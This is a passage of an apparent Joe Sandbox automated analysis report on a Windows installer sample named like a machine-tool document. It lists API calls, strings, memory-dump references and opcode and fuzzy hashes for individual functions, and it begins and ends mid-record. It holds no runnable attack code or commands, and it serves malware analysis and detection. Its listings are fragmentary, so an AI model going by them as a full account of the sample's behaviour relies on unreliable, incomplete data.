                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,00000064,?), ref: 00402BC5
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00402BD5
                                                                                                                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • verifying installer: %d%%, xrefs: 00402BCF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                                                                                                                          • Opcode ID: 021b477a53d38e38848ae55fb8788b954c06de10666cf8d32c7124c9a6df8db9
                                                                                                                                                                                                                          • Instruction ID: 2606314667324be55f41e30219fef3bc9394611b5aff82d746d43452e3b9cc2b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 021b477a53d38e38848ae55fb8788b954c06de10666cf8d32c7124c9a6df8db9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9901FF71540208BBEF109F60DD0AFEE3BB9EB04305F008039FA16B51E1D7B9A955DB59
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: D0/8$D0/8$D0/8$D0/8$F$F$F$F
                                                                                                                                                                                                                          • API String ID: 0-2996504180
                                                                                                                                                                                                                          • Opcode ID: 18738b2065d04d92eda542cd31a2dbd2fb9bcdcf8ce187697e0b2bf994c3e171
                                                                                                                                                                                                                          • Instruction ID: a000aba520b230596783598e20e4afa6fd8c6a74dcedb0ad83a0ea22e939b852
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18738b2065d04d92eda542cd31a2dbd2fb9bcdcf8ce187697e0b2bf994c3e171
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29419334A05349AFC70ADFF4C4526EEBBB2AF86304F1444B9D044AB395CB755A81CB92
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 0040276F
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2667972263-0
                                                                                                                                                                                                                          • Opcode ID: adc363f00f639a767efd08dcf3f901664e61a11698e839af0ef7c90e713b3076
                                                                                                                                                                                                                          • Instruction ID: c72a82ba9ad54cd79da2f6af8e35d97bfd0db4c8549b0f23667d21b619a0d1b1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adc363f00f639a767efd08dcf3f901664e61a11698e839af0ef7c90e713b3076
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E215C71C01124BBCF216FA5DE89EAEBA79EF05324F10423AF910762E1C7794D418FA9
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$wsprintf
                                                                                                                                                                                                                          • String ID: ... %d%%
                                                                                                                                                                                                                          • API String ID: 551687249-2449383134
                                                                                                                                                                                                                          • Opcode ID: fba2786afe0da618518007f80b73922ace53f2d67b6c3c46fda0480cb7e49c5e
                                                                                                                                                                                                                          • Instruction ID: 7e4dc47457cc3da2c56257e898c37067349407ab53618b81eea50406b68a50e3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fba2786afe0da618518007f80b73922ace53f2d67b6c3c46fda0480cb7e49c5e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9517C72902219ABDF10DF65DA04A9F7BB8EB40755F14413BF800B72C4C7789E51DBAA
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CharNextA.USER32(?,*?|<>/":,00000000,00429000,766B3410,0042A400,00000000,004030B4,0042A400,0042A400,004032CD), ref: 00405FC0
                                                                                                                                                                                                                          • CharNextA.USER32(?,?,?,00000000), ref: 00405FCD
                                                                                                                                                                                                                          • CharNextA.USER32(?,00429000,766B3410,0042A400,00000000,004030B4,0042A400,0042A400,004032CD), ref: 00405FD2
                                                                                                                                                                                                                          • CharPrevA.USER32(?,?,766B3410,0042A400,00000000,004030B4,0042A400,0042A400,004032CD), ref: 00405FE2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                                                                          • String ID: *?|<>/":
                                                                                                                                                                                                                          • API String ID: 589700163-165019052
                                                                                                                                                                                                                          • Opcode ID: 630e707e10dd61a13617e1da554c627d06d49c30f7de44bbd37dfc38f3dae12c
                                                                                                                                                                                                                          • Instruction ID: ae1ae60f73f04b2279d28dd2d3a2e9c8876d1ac92d72727c270a9fd7cf783979
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 630e707e10dd61a13617e1da554c627d06d49c30f7de44bbd37dfc38f3dae12c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75119451908B932DEB3216254C44BBB7F99CF56760F18047BE9C4722C2D6BC9C429B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateDirectoryA.KERNEL32(?,?,0042A400), ref: 0040541F
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405433
                                                                                                                                                                                                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405448
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405452
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                          • String ID: ,s@
                                                                                                                                                                                                                          • API String ID: 3449924974-3168275763
                                                                                                                                                                                                                          • Opcode ID: c1937cb38bbd103373e168b49ea038f7d2b8a7083c118a1d29bd15b4f0e45592
                                                                                                                                                                                                                          • Instruction ID: 949b07086bfbcc12ad21f83970ad7e8279e58ae06bb45438fc5c1603e332b0fc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1937cb38bbd103373e168b49ea038f7d2b8a7083c118a1d29bd15b4f0e45592
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D010871D14259EADF119BA0DD447EFBFB8EB04355F004176E904B6181E3789648CFAA
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040603F
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00406078
                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 00406088
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                          • String ID: %s%s.dll$\
                                                                                                                                                                                                                          • API String ID: 2200240437-500877883
                                                                                                                                                                                                                          • Opcode ID: 1d5f31d115a59bc75170d0b5e25867174e87b8d420fe74ce0eee88fcfc4f8209
                                                                                                                                                                                                                          • Instruction ID: d5163558ffe5aed4278454506076ff52b4f001f8688a9739bf5e409abac40a62
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d5f31d115a59bc75170d0b5e25867174e87b8d420fe74ce0eee88fcfc4f8209
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6F0BB7094010A9BDF15DB78DC0DEFB365CEB08304F14057AA547E10D2EA79E975CBA9
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000,00409400,00429800,00000000,00000000,00000031), ref: 00401790
                                                                                                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,00409400,00409400,00000000,00000000,00409400,00429800,00000000,00000000,00000031), ref: 004017BA
                                                                                                                                                                                                                            • Part of subcall function 00405CFD: lstrcpynA.KERNEL32(?,?,00000400,0040318B,00422F20,NSIS Error), ref: 00405D0A
                                                                                                                                                                                                                            • Part of subcall function 00404F16: lstrlenA.KERNEL32(0041F500,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4F
                                                                                                                                                                                                                            • Part of subcall function 00404F16: lstrlenA.KERNEL32(00402FCF,0041F500,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5F
                                                                                                                                                                                                                            • Part of subcall function 00404F16: lstrcatA.KERNEL32(0041F500,00402FCF,00402FCF,0041F500,00000000,?,00000000), ref: 00404F72
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SetWindowTextA.USER32(0041F500,0041F500), ref: 00404F84
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC4
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FD2
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1941528284-0
                                                                                                                                                                                                                          • Opcode ID: 36670ec199ee9b6dfad8f4a6b6b31581e8d9c48027d88929eec7ba2c2c4230c4
                                                                                                                                                                                                                          • Instruction ID: b3254d88aebf37d11d8c7362002191d58d549b74aa0b12ea023da1ca5ce0478c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36670ec199ee9b6dfad8f4a6b6b31581e8d9c48027d88929eec7ba2c2c4230c4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F41C871A04515BADF107BB5CC45EAF3669DF41329F20823BF112F11E2DA3C4A419B6D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
                                                                                                                                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1912718029-0
                                                                                                                                                                                                                          • Opcode ID: b808d0bb620466522610f6ac799511a3b2708a3cf453d6ff390c0abf2acba867
                                                                                                                                                                                                                          • Instruction ID: 77b923b5c768d409b2d5e956d577938eeee851e691c4f647a4d397fc18f4a02c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b808d0bb620466522610f6ac799511a3b2708a3cf453d6ff390c0abf2acba867
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10113D71A00108BEDF229F90DE89DAE3B7DEB54349B504436FA01F10A0D775AE51DB69
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: D0/8$D0/8$T$F$F$F
                                                                                                                                                                                                                          • API String ID: 0-273400982
                                                                                                                                                                                                                          • Opcode ID: a44de4e0901cb65758f58f1f026dc92145ff35e1cc9457eccb72f5d022749f3c
                                                                                                                                                                                                                          • Instruction ID: 0e5d78d2b076c2611cfed745f202bea00ac5b329545188f5ffb6853a63ed1911
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a44de4e0901cb65758f58f1f026dc92145ff35e1cc9457eccb72f5d022749f3c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75216034E00248AFD709EFB4C4527EDB7B2EF85304F4084BA94559B395DB795A85CF82
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?), ref: 00401CE2
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                                                                                                                                                                          • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                                                                                                          • Opcode ID: 845c9a3ca6c3eb3d87070d4cabb74cb02a5cb74176c4da131312543beb8ccc64
                                                                                                                                                                                                                          • Instruction ID: 593f524f0f56d60e1fc11a8a6bbc9e15f3312f291ea64c997066006724e53d58
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 845c9a3ca6c3eb3d87070d4cabb74cb02a5cb74176c4da131312543beb8ccc64
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FEF03CB2A04114AFEB01ABE4DE88CAF77BCEB54301B004476F601F6190C7749D018B79
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDC.USER32(?), ref: 00401D3B
                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                                                                                                                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0040A808), ref: 00401DB3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3808545654-0
                                                                                                                                                                                                                          • Opcode ID: 934ac727ed26cce9d36a2a29c825db931d3237c7f30b43815e60a06d3d00d0c6
                                                                                                                                                                                                                          • Instruction ID: 9e7a7182ae9254896fc63aeedc32ca6a3ce3e3ef4d7c41cc1e10fd7b3e73fcff
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 934ac727ed26cce9d36a2a29c825db931d3237c7f30b43815e60a06d3d00d0c6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59016232944340AFE7016B70AE5EBA93FA89795305F10C475F201B62E2C57801569F7F
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(0041FD20,0041FD20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045F2,000000DF,00000000,00000400,?), ref: 00404775
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 0040477D
                                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,0041FD20), ref: 00404790
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                          • Opcode ID: 237ba65d13aee49a15e6db87fc30394a63326bd4b6ae992c739a23ec13e2d8da
                                                                                                                                                                                                                          • Instruction ID: fde7fbcda73e06f71546803af61accc205d2577e4f834e35a140aa318663f7c1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 237ba65d13aee49a15e6db87fc30394a63326bd4b6ae992c739a23ec13e2d8da
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3411E773A0412877DB10666D9C45EAF3288DB86374F254237FA26F31D1EA788C1281F8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: D0/8$D0/8$F$F$F
                                                                                                                                                                                                                          • API String ID: 0-3000154358
                                                                                                                                                                                                                          • Opcode ID: b0e8e22d04040b876249dd68622147038610218a8ae79d2919e1a11549bc39b8
                                                                                                                                                                                                                          • Instruction ID: aff38579c553cfa6854c9bc23dba9a8cf924928a1d89d7d11fe2bd6931b97a50
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0e8e22d04040b876249dd68622147038610218a8ae79d2919e1a11549bc39b8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6316F74E042499FCB09DFB4C4516EEBBB2AF89304F104479D444AB395DB755A81CF91
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,000000F0), ref: 00401FBB
                                                                                                                                                                                                                            • Part of subcall function 00404F16: lstrlenA.KERNEL32(0041F500,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4F
                                                                                                                                                                                                                            • Part of subcall function 00404F16: lstrlenA.KERNEL32(00402FCF,0041F500,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5F
                                                                                                                                                                                                                            • Part of subcall function 00404F16: lstrcatA.KERNEL32(0041F500,00402FCF,00402FCF,0041F500,00000000,?,00000000), ref: 00404F72
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SetWindowTextA.USER32(0041F500,0041F500), ref: 00404F84
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC4
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FD2
                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00401FCB
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 00402045
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2987980305-0
                                                                                                                                                                                                                          • Opcode ID: 2b30b5f6382e984e85022a8f1f2fd2ed0a9551c46cb845ede73f55fd13b9698d
                                                                                                                                                                                                                          • Instruction ID: b68841798668a23a4ff443840be3121a405d120f2a8fc72f381fb15ba3c401f2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b30b5f6382e984e85022a8f1f2fd2ed0a9551c46cb845ede73f55fd13b9698d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72212E72904215FBDF217F648E4DA6E7670AB45318F30423BF301B52D0D7BD49419A6E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00409C00,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(?,?,?,?,00409C00,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,00409C00,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateValuelstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1356686001-0
                                                                                                                                                                                                                          • Opcode ID: 1479a39ed53ebae2bf8867e30db793c1b729056d8581af6253ce6a52201b047e
                                                                                                                                                                                                                          • Instruction ID: 133b3897f1a97e650f74ae2c97eeacc267919fe8998a33790bec377d3be5ae35
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1479a39ed53ebae2bf8867e30db793c1b729056d8581af6253ce6a52201b047e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F61163B1E00108BFEB10AFA4DE89EAF7A79EB54358F10403AF505B61D1D6B85D419A28
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DestroyWindow.USER32(?,00000000,00402DE2,?), ref: 00402C15
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402C33
